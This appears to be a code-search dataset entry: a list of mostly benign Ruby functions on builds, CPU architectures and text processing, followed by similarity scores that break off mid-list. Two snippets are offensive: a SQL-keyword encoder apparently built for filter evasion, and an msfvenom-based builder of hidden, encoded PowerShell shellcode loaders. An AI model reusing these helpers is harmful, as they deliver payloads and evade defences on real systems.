"def pre_build\n puts \"pre_build dir=#{`pwd`}\"\n rbvt = RUBY_V\n rbvm = RUBY_V[/^\\d+\\.\\d+/]\n mkdir_p \"#{TGT_DIR}/lib\"\n # clean out leftovers from last build\n rm_f \"#{TGT_DIR}/libruby.so\" if File.exist? \"#{TGT_DIR}/libruby.so\"\n rm_f \"#{TGT_DIR}/libruby.so.#{rbvm}\" if File.exist? \"#{TGT_DIR}/libruby.so.#{rbvm}\"\n rm_f \"#{TGT_DIR}/libruby.so.#{rbvt}\" if File.exist? \"#{TGT_DIR}/libruby.so.#{rbvt}\"\n cp_r \"#{EXT_RUBY}/lib/ruby\", \"#{TGT_DIR}/lib\"\n # copy and link libruby.so - pick the right one to \n # cp \"#{EXT_RUBY}/lib/libruby.so.#{RUBY_V}\", \"#{TGT_DIR}\"\n cp \"#{EXT_RUBY}/lib/libruby.so.#{rbvm}\", \"#{TGT_DIR}\"\n # copy include files - it might help build gems\n mkdir_p \"#{TGT_DIR}/lib/ruby/include/ruby-#{rbvt}\"\n cp_r \"#{EXT_RUBY}/include/ruby-#{rbvt}/\", \"#{TGT_DIR}/lib/ruby/include\"\n # can't figure out ln -s? push pwd, cd, ln, pop\n #cdir = pwd\n #cd TGT_DIR\n chdir TGT_DIR do\n ln_s \"libruby.so.#{rbvm}\", \"libruby.so\"\n #ln_s \"libruby.so.#{RUBY_V}\", \"libruby.so.#{::RUBY_V[/^\\d+\\.\\d+/]}\"\n end\n SOLOCS.each_value do |path|\n cp \"#{path}\", \"#{TGT_DIR}\"\n end\n end",
"def post_process_text(s) \n # extract math\n math, arrays = [], []\n s.scan(/\\$([^$]+)\\$/) {|m| math << m } # $$\n s.scan(/\\\\\\[([^$]+)\\\\\\]/) {|m| arrays << m } # \\[ \\]\n # citations\n s = replace_citations(s)\n # listings, algorithms, tables\n s = replace_listings(s)\n # custom \n s = replace_custom_refs(s)\n # texttt\n s = replace_texttt(s)\n # emph\n s = replace_emph(s)\n # textbf\n s = replace_bf(s)\n # urls\n s = replace_urls(s)\n # footnotes\n s = replace_footnotes(s)\n # paragrams\n s = replace_paragraphs(s)\n # chapter refs\n s = replace_chapter_refs(s)\n # section refs\n s = remove_section_refs(s)\n # replace markboth with nothing\n s = replace_markboth(s)\n # remove hypenation suggestions\n s = remove_hyph_suggestions(s)\n # umlats etc\n s = character_processing(s)\n # replace \\% with %\n s = s.gsub(\"\\\\%\", \"\\%\")\n # replace \"\\ \" with a space\n s = s.gsub(\"\\\\ \", \" \")\n # replace \\\" and \\' with nothing\n s = s.gsub(\"\\\\\\\"\", \"\")\n s = s.gsub(\"\\\\\\'\", \"\")\n # replace ~ with space\n s = s.gsub(\"~\", \" \")\n # replace \\$ with $ (testing algorithms)\n s = s.gsub(\"\\\\$\", \"$\")\n # replace \\_ with _ (testing algorithms)\n s = s.gsub(\"\\\\_\", \"_\") \n # replace \\# with # (appendix)\n s = s.gsub(\"\\\\#\", \"#\")\n # replace \\{ with { (appendix)\n s = s.gsub(\"\\\\{\", \"{\")\n # replace \\} with } (appendix)\n s = s.gsub(\"\\\\}\", \"}\") \n # replace \\\\ with <br /> (appendix, de)\n s = s.gsub(\"\\\\\\\\\", \"<br />\") \n # replace \\Latex with LaTex\n s = s.gsub(\"\\\\LaTeX\", \"LaTex\") \n # replace \\copyright with html copyright\n s = s.gsub(\"\\\\copyright\", \"©\")\n # replace \\mybookdate\\ with publication date 2011\n s = s.gsub(\"\\\\mybookdate\", DATE)\n # replace \\mybookauthor with the author ame\n s = s.gsub(\"\\\\mybookauthor\", \"Jason Brownlee\")\n # replace \\mybooktitle with the book title\n s = s.gsub(\"\\\\mybooktitle\", TITLE)\n # replace \\mybooksubtitle with the book subtitle\n s = s.gsub(\"\\\\mybooksubtitle\", SUBTITLE)\n # finally switch ` for ' (late in the subs)\n s = s.gsub(\"`\", \"'\")\n \n # put the math back\n if !math.empty?\n index = 0\n s = s.gsub(/\\$([^$]+)\\$/) do |m|\n index += 1\n \"$#{math[index - 1]}$\"\n end\n end \n if !arrays.empty?\n index = 0\n s = s.gsub(/\\\\\\[([^$]+)\\\\\\]/) do |m|\n index += 1\n \"\\\\[#{arrays[index - 1]}\\\\]\"\n end\n end\n return s\nend",
"def architect\n map_field(:architect)&.map { |a| a.gsub(/ \\$[a-z] /, ' ') }\n end",
"def show_machine_arch\n\t\t\tputs \" Machine: #{ELF_MACHINE_ARCH_LIST[@elf_machine.to_i]} (#{@elf_machine.to_i})\"\n\t\tend",
"def arch_32_bit; :i386; end",
"def add_priv_assm\n libruby_regex = /msvcrt-ruby\\d+\\.dll$/i\n bin_dir = File.join D_INSTALL, \"bin\"\n Dir.chdir(bin_dir) { |d|\n libruby = Dir['*.dll'].grep(libruby_regex)[0]\n new = <<-EOT\n <dependency>\n <dependentAssembly>\n <assemblyIdentity version='1.0.0.0' type='win32' name='ruby_builtin_dlls'/>\n </dependentAssembly>\n </dependency>\n <file name='#{libruby}'/>\nEOT\n ['ruby.exe', 'rubyw.exe'].each { |fn|\n image = File.binread(fn)\n image.gsub!(/<\\?xml.*?<assembly.*?<\\/assembly>\\s+/m) { |m|\n orig_len = m.bytesize\n newm = m.gsub(/^\\s*<\\/assembly>/, \"#{new}</assembly>\")\n # shorten to match original\n newm.gsub!(/<!--The ID below indicates application support for/, '<!--') if newm.bytesize > orig_len\n newm.gsub!(/^ *<!--.*?-->\\n/m, \"\") if newm.bytesize > orig_len\n newm.gsub!(/^ +/, \"\") if newm.bytesize > orig_len\n raise \"replacement manifest too big #{m.bytesize} < #{newm.bytesize}\" if m.bytesize < newm.bytesize\n newm + \" \" * (orig_len - newm.bytesize)\n }\n File.binwrite(fn, image)\n }\n }\n end",
"def enable_i386_arch!\n execute 'dpkg --add-architecture i386' do\n only_if do\n cmd = 'dpkg --print-architecture; ' \\\n 'dpkg --print-foreign-architectures'\n !shell_out!(cmd).stdout.lines.include?('i386')\n end\n notifies :run, 'execute[apt-get update]', :immediately\n end\n end",
"def get_ay_fusion_guest_os(options)\n guest_os = \"sles11\"\n if not options['arch'].to_s.match(/i386/) and not options['arch'].to_s.match(/64/)\n guest_os = guest_os+\"-64\"\n end\n return guest_os\nend",
"def arch_lookup(sys_type)\n return \"x86_64\" if sys_type == \"x64-based PC\"\n return \"i386\" if sys_type == \"X86-based PC\"\n\n sys_type\n end",
"def build filetask,system_config,platform\n cmd_file=command_file(filetask.name,system_config,platform)\n if File.exists?(cmd_file)\n config=system_config.platform_config(platform)\n if cmd_file.end_with?('.library')\n cmdline = librarian(cmd_file,config)\n else\n cmdline = linker(cmd_file,config)\n end\n sh(cmdline.join(' '))\n else\n raise GaudiError, \"Missing command file for #{filetask.name}\"\n end\n end",
"def arch\n return `uname -m`.chomp\n end",
"def esc!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in(__method__, 46)\n\n \n # - - - - main rule block - - - -\n # at line 504:7: '\\\\\\\\' ( 'n' | 'r' | 't' | 'b' | 'f' | '\\\"' | '\\\\'' | '\\\\\\\\' | '>' | 'u' XDIGIT XDIGIT XDIGIT XDIGIT | . )\n match(?\\\\)\n # at line 505:3: ( 'n' | 'r' | 't' | 'b' | 'f' | '\\\"' | '\\\\'' | '\\\\\\\\' | '>' | 'u' XDIGIT XDIGIT XDIGIT XDIGIT | . )\n alt_9 = 11\n alt_9 = @dfa9.predict(@input)\n case alt_9\n when 1\n # at line 505:5: 'n'\n match(?n)\n\n when 2\n # at line 506:5: 'r'\n match(?r)\n\n when 3\n # at line 507:5: 't'\n match(?t)\n\n when 4\n # at line 508:5: 'b'\n match(?b)\n\n when 5\n # at line 509:5: 'f'\n match(?f)\n\n when 6\n # at line 510:5: '\\\"'\n match(?\")\n\n when 7\n # at line 511:5: '\\\\''\n match(?\\')\n\n when 8\n # at line 512:5: '\\\\\\\\'\n match(?\\\\)\n\n when 9\n # at line 513:5: '>'\n match(?>)\n\n when 10\n # at line 514:5: 'u' XDIGIT XDIGIT XDIGIT XDIGIT\n match(?u)\n xdigit!\n xdigit!\n xdigit!\n xdigit!\n\n when 11\n # at line 515:5: .\n match_any\n\n end\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out(__method__, 46)\n\n end",
"def safe_architecture\n if intel?\n \"i386\"\n elsif sparc?\n \"sparc\"\n else\n Ohai[\"kernel\"][\"machine\"]\n end\n end",
"def format_ruby_command(shell_script_file_path, *arguments)\n return format_executable_command(sandbox_ruby, *([shell_script_file_path] + arguments))\n end",
"def setup\n bin = File.basename $0\n name = bin.underscore\n\n erb_src_path = ::Thor::ROOT.join 'support',\n 'completion',\n 'complete.inc.bash.erb'\n\n erb_src = erb_src_path.read\n\n bash_src = binding.erb erb_src\n\n puts bash_src\n\n nil\n end",
"def tralics_commands\n base_commands = <<-'EOS'\n% Commands specific to Tralics\n\\def\\hyperref[#1]#2{\\xmlelt{a}{\\XMLaddatt{target}{#1}#2}}\n\\newcommand{\\heading}[1]{\\xmlelt{heading}{#1}}\n\\newcommand{\\codecaption}[1]{\\xmlelt{heading}{#1}}\n\\newcommand{\\sout}[1]{\\xmlelt{sout}{#1}}\n\\newcommand{\\kode}[1]{\\xmlelt{kode}{#1}}\n\\newcommand{\\coloredtext}[2]{\\xmlelt{coloredtext}{\\AddAttToCurrent{color}{#1}#2}}\n\\newcommand{\\coloredtexthtml}[2]{\\xmlelt{coloredtexthtml}{\\AddAttToCurrent{color}{#1}#2}}\n\\newcommand{\\filepath}[1]{\\xmlelt{filepath}{#1}}\n\\newcommand{\\image}[1]{\\xmlelt{image}{#1}}\n\\newcommand{\\imagebox}[1]{\\xmlelt{imagebox}{#1}}\n% Ignore pbox argument, just replacing with content.\n\\newcommand{\\pbox}[2]{#2}\n% Ignore some other commands.\n\\newcommand{\\includepdf}[1]{}\n\\newcommand{\\newunicodechar}[2]{}\n\\newcommand{\\extrafloats}[1]{}\n EOS\n custom_commands = <<-EOS\n\\\\usepackage{amsthm}\n\\\\theoremstyle{definition}\n\\\\newtheorem{codelisting}{#{language_labels[\"listing\"]}}[chapter]\n\\\\newtheorem{aside}{#{language_labels[\"aside\"]}}[chapter]\n EOS\n [base_commands, custom_commands].join(\"\\n\")\n end",
"def hex_encode_keywords\n if self =~ /(select)/i\n foo=$1\n newstr = self.gsub(foo, foo.gsub(/e/i, \"%#{'e'.hexme}\"))\n else\n newstr = self\n end\n if newstr =~ /(update)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/p/i, \"%#{'p'.hexme}\"))\n end\n if newstr =~ /(insert)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/s/i, \"%#{'s'.hexme}\"))\n end\n if newstr =~ /(delete)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/l/i, \"%#{'l'.hexme}\"))\n end\n if newstr =~ /(union)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/n/i, \"%#{'n'.hexme}\"))\n end\n if newstr =~ /[, ](concat)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/c/i, \"%#{'c'.hexme}\"))\n end\n if newstr =~ /(group_concat)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/o/i, \"%#{'o'.hexme}\"))\n end\n if newstr =~ /(information_schema)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/a/i, \"%#{'a'.hexme}\"))\n end\n if newstr =~ /(cast)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/t/i, \"%#{'t'.hexme}\"))\n end\n if newstr =~ /(convert)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/v/i, \"%#{'v'.hexme}\"))\n end\n if newstr =~ /(substring)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.gsub(/s/i, \"%#{'s'.hexme}\"))\n end\n if newstr =~ /(sleep)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/p/i, \"%#{'p'.hexme}\"))\n end\n if newstr =~ /(benchmark)/i\n foo=$1\n newstr = newstr.gsub!(foo, foo.sub(/b/i, \"%#{'b'.hexme}\"))\n end\n return newstr\n end",
"def create_md tool\n \n original = tool[1].split(\"\\n\")\n new = []\n note = false\n\n # Cambia las rutas y < y > por código HTML\n def diple l\n return l.gsub('de +++YAML+++ en <http://pecas.cliteratu.re>', 'de [+++YAML+++](yaml.html)')\n .gsub('de JavaScript en <http://pecas.cliteratu.re>', 'de [JavaScript](js.html)')\n .gsub('Lista de acrónimos: <https://github.com/tesseract-ocr/tesseract/blob/master/doc/tesseract.1.asc#languages>', '[Lista de acrónimos](https://github.com/tesseract-ocr/tesseract/blob/master/doc/tesseract.1.asc#languages)')\n .gsub('<','<').gsub('>','>')\n end\n\n # Agrega versalitas\n def smallcaps l\n return l.gsub(/([A-Z]{3,})/, '+++\\1+++')\n end\n\n # Cambia comillas por sintaxis para línea de código\n def to_code l\n return l.gsub(/«(.+?)»/, '`\\1`')\n end\n\n # Añade líneas de código en las opciones\n def to_code_option l\n return l.gsub(/^(\\S+)/, '`\\1`')\n end\n\n new.push('# ' + $l_g_pc_docs_creation + '`' + tool[0] + '`')\n\n original.each_with_index do |l, i|\n\n l = to_code(diple(smallcaps(l)))\n\n if l =~ /^\\S/\n # Encabezados 2\n if l !~ /^Nota/ && i != 1\n new.push('## ' + l + \"\\n\\n\")\n # Párrafos\n else\n # Notas\n if l =~ /^Nota/\n if !note\n new.push(\"--- {.espacio-arriba3}\\n\\n\")\n note = true\n new.push(l + ' {.espacio-arriba3}')\n else\n new.push(l + ' {.espacio-arriba1 .sin-sangria}')\n end \n # Descripción\n else\n # Esto servirá para crear «herramientas.md»\n $tools_md[\"#{tool[0]}\"] = [tool[0], l.gsub(/^\\S+\\s+/, '')]\n new.push(l)\n end\n end\n else\n if l.strip != ''\n l = l.strip\n\n # Opciones de Pecas\n if l =~ /^-/\n new.push('* ' + to_code_option(l))\n # Comandos de Pecas\n elsif l =~ /^pc-/\n new.push('```')\n new.push(l)\n new.push('```')\n # Explicaciones\n elsif l =~ /^[A-Z]/\n new.push(\"\\n\" + l)\n # Dependencias / Tipos\n else\n # Evita que se quede como línea de código el tipo y su descripción\n l_final = []\n l.split(/\\s+/).each_with_index do |ll, i|\n # Solo la primera palabra se va como código\n if i == 0\n l_final.push('* `' + ll + '`')\n # El resto de las palabras se quedan como texto\n else\n l_final.push(ll)\n end\n end\n new.push(l_final.join(' '))\n end\n # Líneas en blanco\n else\n new.push(l)\n end\n end\n end\n\n\tarchivo = File.new(Dir.pwd + '/md/' + tool[0] + '.md', 'w:UTF-8')\n\tarchivo.puts new\n\tarchivo.close\nend",
"def suse_linux_type\n if @suse_linux_type.nil?\n out = nil\n text = FilePath.new(\"/etc/SuSE-release\").suck_file\n unless text.nil?\n if text =~ /suse/i\n out = \"sl\"\n out += \"es\" if text =~ /enterprise\\s*server/i\n out += \"%s\" % $1 if text =~ /^[^\\d]+(\\d+)/i\n end\n end\n \n @suse_linux_type = out\n end\n \n @suse_linux_type\n end",
"def shell_string!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 2 )\n\n type = SHELL_STRING\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 20:5: '`' (~ ( '`' | '\\\\\\\\' ) | '\\\\\\\\' . )* '`'\n match( 0x60 )\n # at line 20:9: (~ ( '`' | '\\\\\\\\' ) | '\\\\\\\\' . )*\n while true # decision 4\n alt_4 = 3\n look_4_0 = @input.peek( 1 )\n\n if ( look_4_0.between?( 0x0, 0x5b ) || look_4_0.between?( 0x5d, 0x5f ) || look_4_0.between?( 0x61, 0xffff ) )\n alt_4 = 1\n elsif ( look_4_0 == 0x5c )\n alt_4 = 2\n\n end\n case alt_4\n when 1\n # at line 20:11: ~ ( '`' | '\\\\\\\\' )\n if @input.peek( 1 ).between?( 0x0, 0x5b ) || @input.peek( 1 ).between?( 0x5d, 0x5f ) || @input.peek( 1 ).between?( 0x61, 0xff )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n when 2\n # at line 20:27: '\\\\\\\\' .\n match( 0x5c )\n match_any\n\n else\n break # out of loop for decision 4\n end\n end # loop for decision 4\n match( 0x60 )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 2 )\n\n end",
"def objdump_arch(arch)\n case arch\n when :amd64 then 'i386:x86-64'\n else arch.to_s\n end\n end",
"def powershell_prefix\n [\n Mixlib::Install::Generator::PowerShell.get_script(\"helpers.ps1\"),\n \"$platform_architecture = Get-PlatformArchitecture\",\n \"$platform_version = Get-PlatformVersion\",\n ].join(\"\\n\")\n end",
"def mock_to_dist_version_arch(mock)\n # We care about matching against two patterns here:\n # pupent-3.4-el5-i386 <= old style with PE_VER baked into the mock name\n # pupent-el5-i386 <= new style derived from a template\n mock.match(/pupent(-\\d\\.\\d)?-([a-z]*)(\\d*)-([^-]*)/)[2..4]\n end",
"def arch?(node = __getnode)\n node[\"platform_family\"] == \"arch\"\n end",
"def to_ruby\n mark_version\n result = []\n result << \"# -*- encoding: utf-8 -*-\"\n result << \"#{Gem::StubSpecification::PREFIX}#{name} #{version} #{platform} #{raw_require_paths.join(\"\\0\")}\"\n result << \"#{Gem::StubSpecification::PREFIX}#{extensions.join \"\\0\"}\" unless\n extensions.empty?\n result << nil\n result << \"Gem::Specification.new do |s|\"\n\n result << \" s.name = #{ruby_code name}\"\n result << \" s.version = #{ruby_code version}\"\n unless platform.nil? or platform == Gem::Platform::RUBY\n result << \" s.platform = #{ruby_code original_platform}\"\n end\n result << \"\"\n result << \" s.required_rubygems_version = #{ruby_code required_rubygems_version} if s.respond_to? :required_rubygems_version=\"\n\n if metadata and !metadata.empty?\n result << \" s.metadata = #{ruby_code metadata} if s.respond_to? :metadata=\"\n end\n result << \" s.require_paths = #{ruby_code raw_require_paths}\"\n\n handled = [\n :dependencies,\n :name,\n :platform,\n :require_paths,\n :required_rubygems_version,\n :specification_version,\n :version,\n :has_rdoc,\n :default_executable,\n :metadata,\n :signing_key,\n ]\n\n @@attributes.each do |attr_name|\n next if handled.include? attr_name\n current_value = self.send(attr_name)\n if current_value != default_value(attr_name) || self.class.required_attribute?(attr_name)\n result << \" s.#{attr_name} = #{ruby_code current_value}\"\n end\n end\n\n if String === signing_key\n result << \" s.signing_key = #{signing_key.dump}.freeze\"\n end\n\n if @installed_by_version\n result << nil\n result << \" s.installed_by_version = \\\"#{Gem::VERSION}\\\" if s.respond_to? :installed_by_version\"\n end\n\n unless dependencies.empty?\n result << nil\n result << \" if s.respond_to? :specification_version then\"\n result << \" s.specification_version = #{specification_version}\"\n result << \" end\"\n result << nil\n\n result << \" if s.respond_to? :add_runtime_dependency then\"\n\n dependencies.each do |dep|\n req = dep.requirements_list.inspect\n dep.instance_variable_set :@type, :runtime if dep.type.nil? # HACK\n result << \" s.add_#{dep.type}_dependency(%q<#{dep.name}>.freeze, #{req})\"\n end\n\n result << \" else\"\n dependencies.each do |dep|\n version_reqs_param = dep.requirements_list.inspect\n result << \" s.add_dependency(%q<#{dep.name}>.freeze, #{version_reqs_param})\"\n end\n result << \" end\"\n end\n\n result << \"end\"\n result << nil\n\n result.join \"\\n\"\n end",
"def compile_to_ruby\n \"\"\n end",
"def run_command_with_os_architecture(script, interpreter, options)\n options ||= {}\n options = options.dup\n arch = options.delete(:architecture)\n\n with_os_architecture(nil, architecture: arch) do\n shell_out(\n build_powershell_command(script, interpreter),\n **options\n )\n end\n end",
"def powershell_builder(venomstring)\n if File.exists?(\"#{MSFPATH}msfvenom\")\n # venomstring should be the arguments needed for msfvenom to build the base payload/shellcode ('-p <payload> LHOST=<ip> LPORT=<port>'\n shellcode=\"#{`#{MSFPATH}msfvenom #{venomstring} -b \\\\x00`}\".gsub(\";\", \"\").gsub(\" \", \"\").gsub(\"+\", \"\").gsub('\"', \"\").gsub(\"\\n\", \"\").gsub('buf=','').strip.gsub('\\\\',',0').sub(',', '')\n #\t=> yields a variable holding our escapped shellcode with ',' between each char.....\n\n puts \"[\".light_blue + \"*\".white + \"]\".light_blue + \" Converting Base ShellCode to PowerShell friendly format.....\".white\n # Borrowed from one of several appearances across the many Python written scripts....\n ps_base = \"$code = '[DllImport(\\\"kernel32.dll\\\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(\\\"kernel32.dll\\\")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(\\\"msvcrt.dll\\\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name \\\"Win32\\\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = %s;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };\"\n # => Our base PowerShell wrapper to get the job done now in var\n # => place our shellcode in the placeholders\n ps_base_cmd = ps_base.sub('%s', shellcode) \n # Prep it for final stages and put in funky ps format....\n ps_cmd_prepped=String.new\n ps_base_cmd.scan(/./) {|char| ps_cmd_prepped += char + \"\\x00\" }\n\n # Base64 Encode our Payload so it is primed & ready for PowerShell usage\n stager = Base64.encode64(\"#{ps_cmd_prepped}\")\n\n # The magic is now ready!\n ps_cmd = 'powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand ' + stager.gsub(\"\\n\", '')\n return ps_cmd\n else\n puts \"[\".light_red + \"*\".white + \"]\".light_red + \" Can't find MSFVENOM to build payloads!\".white\n puts \"[\".light_red + \"*\".white + \"]\".light_red + \" Check or provide MSF Path in source to correct......\".white\n return nil\n end\nend",
"def with_standard_compiler_flags(env = {}, opts = {})\n env ||= {}\n opts ||= {}\n compiler_flags =\n case Ohai[\"platform\"]\n when \"aix\"\n {\n \"CC\" => \"xlc_r -q64\",\n \"CXX\" => \"xlC_r -q64\",\n \"CFLAGS\" => \"-q64 -I#{install_dir}/embedded/include -D_LARGE_FILES -O\",\n \"LDFLAGS\" => \"-q64 -L#{install_dir}/embedded/lib -Wl,-blibpath:#{install_dir}/embedded/lib:/usr/lib:/lib\",\n \"LD\" => \"ld -b64\",\n \"OBJECT_MODE\" => \"64\",\n \"ARFLAGS\" => \"-X64 cru\",\n }\n when \"solaris2\"\n {\n \"CC\" => \"gcc -m64 -static-libgcc\",\n \"LDFLAGS\" => \"-Wl,-rpath,#{install_dir}/embedded/lib -L#{install_dir}/embedded/lib -static-libgcc\",\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include -O2\",\n }\n when \"freebsd\"\n {\n \"CC\" => \"clang\",\n \"CXX\" => \"clang++\",\n \"LDFLAGS\" => \"-L#{install_dir}/embedded/lib -Wl,-rpath,#{install_dir}/embedded/lib\",\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include -O3 -D_FORTIFY_SOURCE=2 -fstack-protector\",\n }\n when \"windows\"\n arch_flag = windows_arch_i386? ? \"-m32\" : \"-m64\"\n opt_flag = windows_arch_i386? ? \"-march=i686\" : \"-march=x86-64\"\n {\n \"LDFLAGS\" => \"-L#{install_dir}/embedded/lib #{arch_flag} -fno-lto\",\n # We do not wish to enable SSE even though we target i686 because\n # of a stack alignment issue with some libraries. We have not\n # exactly ascertained the cause but some compiled library/binary\n # violates gcc's assumption that the stack is going to be 16-byte\n # aligned which is just fine as long as one is pushing 32-bit\n # values from general purpose registers but stuff hits the fan as\n # soon as gcc emits aligned SSE xmm register spills which generate\n # GPEs and terminate the application very rudely with very little\n # to debug with.\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include #{arch_flag} -O3 #{opt_flag}\",\n }\n else\n {\n \"LDFLAGS\" => \"-Wl,-rpath,#{install_dir}/embedded/lib -L#{install_dir}/embedded/lib\",\n \"CFLAGS\" => \"-I#{install_dir}/embedded/include -O3 -D_FORTIFY_SOURCE=2 -fstack-protector\",\n }\n end\n\n # merge LD_RUN_PATH into the environment. most unix distros will fall\n # back to this if there is no LDFLAGS passed to the linker that sets\n # the rpath. the LDFLAGS -R or -Wl,-rpath will override this, but in\n # some cases software may drop our LDFLAGS or think it knows better\n # and edit them, and we *really* want the rpath setting and do know\n # better. in that case LD_RUN_PATH will probably survive whatever\n # edits the configure script does\n extra_linker_flags = {\n \"LD_RUN_PATH\" => \"#{install_dir}/embedded/lib\",\n }\n\n if solaris2?\n ld_options = \"-R#{install_dir}/embedded/lib\"\n\n if platform_version.satisfies?(\"<= 5.10\")\n # in order to provide compatibility for earlier versions of libc on solaris 10,\n # we need to specify a mapfile that restricts the version of system libraries\n # used. See http://docs.oracle.com/cd/E23824_01/html/819-0690/chapter5-1.html\n # for more information\n # use the mapfile if it exists, otherwise ignore it\n mapfile_path = File.expand_path(Config.solaris_linker_mapfile, Config.project_root)\n ld_options << \" -M #{mapfile_path}\" if File.exist?(mapfile_path)\n end\n\n # solaris linker can also use LD_OPTIONS, so we throw the kitchen sink against\n # the linker, to find every way to make it use our rpath. 
This is also required\n # to use the aforementioned mapfile.\n extra_linker_flags[\"LD_OPTIONS\"] = ld_options\n end\n\n env.merge(compiler_flags)\n .merge(extra_linker_flags).\n # always want to favor pkg-config from embedded location to not hose\n # configure scripts which try to be too clever and ignore our explicit\n # CFLAGS and LDFLAGS in favor of pkg-config info\n merge({ \"PKG_CONFIG_PATH\" => \"#{install_dir}/embedded/lib/pkgconfig\" }).\n # Set default values for CXXFLAGS and CPPFLAGS.\n merge(\"CXXFLAGS\" => compiler_flags[\"CFLAGS\"])\n .merge(\"CPPFLAGS\" => compiler_flags[\"CFLAGS\"])\n .merge(\"OMNIBUS_INSTALL_DIR\" => install_dir)\n end",
"def file_task(re, runtime, signature, version, rb, rbc)\n rbc ||= rb.sub(re, \"runtime/#{version}\") + \"c\"\n\n file rbc => [rb, signature]\n runtime << rbc\nend",
"def set_platform_opts\n\n # Expand any embedded variables (like '$(CC)')\n CONFIG[\"CC\"] = RbConfig::CONFIG[\"CC\"]\n CONFIG[\"LDSHARED\"] = RbConfig::CONFIG[\"LDSHARED\"]\n\n # Make sure we have a CXX value (sometimes there isn't one)\n CONFIG[\"CXX\"] = CONFIG[\"CC\"] unless CONFIG.has_key?(\"CXX\")\n\n # O/S specific oddities\n\n case p4osname\n when /DARWIN/\n CONFIG['CC'] = 'xcrun c++'\n CONFIG['CXX'] = 'xcrun c++'\n CONFIG['LDSHARED'] = CONFIG['CXX'] + ' -bundle'\n when /FREEBSD/, /LINUX/\n # FreeBSD 6 and some Linuxes use 'cc' for linking by default. The\n # gcc detection patterns above won't catch that, so for these\n # platforms, we specifically convert cc to c++.\n CONFIG['LDSHARED'].sub!(/^cc/, 'c++')\n when /MINGW32/\n # When building with MinGW we need to statically link libgcc\n # and make sure we're linking with gcc and not g++. On older\n # Rubies, they use LDSHARED; newer ones (>=1.9) use LDSHAREDXX\n CONFIG['LDSHARED'].sub!(/g\\+\\+/, 'gcc')\n CONFIG['LDSHAREDXX'].sub!(/g\\+\\+/, 'gcc')\n CONFIG['LDSHARED'] = CONFIG['LDSHARED'] + ' -static-libgcc'\n CONFIG['LDSHAREDXX'] = CONFIG['LDSHARED'] + ' -static-libgcc'\n end\nend",
"def extract(contents)\n file_text, matches = parse(contents)\n\n extracted_ruby = +''\n\n last_match = [0, 0]\n matches.each_with_index do |(start_index, end_index), index|\n handle_region_before(start_index, last_match.last, file_text, extracted_ruby)\n\n match_marker = \"#{region_start_marker}_#{format('%010d', index + 1)}\" if region_start_marker\n extracted_ruby << extract_match(file_text, start_index, end_index, match_marker)\n\n last_match = [start_index, end_index]\n end\n\n extracted_ruby << file_text[last_match.last..-1].gsub(/./, ' ')\n\n # if we replaced <%== with <%= raw, try to shift the columns back to the\n # left so they match the original again\n extracted_ruby.gsub!(/ raw/, 'raw')\n\n extracted_ruby\n end",
"def yum_repo_platform_string\n platform = platform?('fedora') ? 'fedora' : 'rhel'\n release = platform?('amazon') ? '7' : '$releasever'\n \"#{platform}-#{release}-$basearch\"\n end"
] | [
"0.5715107",
"0.5702827",
"0.5696714",
"0.560849",
"0.533406",
"0.5309851",
"0.5295959",
"0.5290549",
"0.5278227",
"0.52700776",
"0.52656204",
"0.5238063",
"0.52332914",
"0.521695",
"0.5212728",
"0.521216",
"0.5198948",
"0.5113907",
"0.50973797",
"0.50776345",
"0.50765723",
"0.50410503",
"0.50288564",
"0.502854",
"0.50207114",
"0.50189906",
"0.50156325",
"0.4997255",
"0.4991878",
"0.49809667",
"0.49808553",
"0.49630272",
"0.49524066",
"0.49446306",
"0.49429014",
"0.49312183",
"0.49271193",
"0.49254408",
"0.49068528",
"0.49057215",
"0.48958224",
"0.48945555",
"0.48931578",
"0.48895195",
"0.48866978",
"0.48817018",
"0.48773223",
"0.48764557",
"0.48757845",
"0.4867624",
"0.4849564",
"0.4827327",
"0.4826673",
"0.48241496",
"0.48227462",
"0.48167363",
"0.48107046",
"0.48035482",
"0.47996077",
"0.47844324",
"0.47835627",
"0.47770554",
"0.47746047",
"0.4773452",
"0.47709844",
"0.47671124",
"0.4757899",
"0.47487652",
"0.47482827",
"0.47481284",
"0.47436237",
"0.47419044",
"0.47405764",
"0.47367078",
"0.4735782",
"0.47334886",
"0.47319683",
"0.47285962",
"0.47252917",
"0.4725229",
"0.47250533",
"0.47235373",
"0.47221255",
"0.47196704",
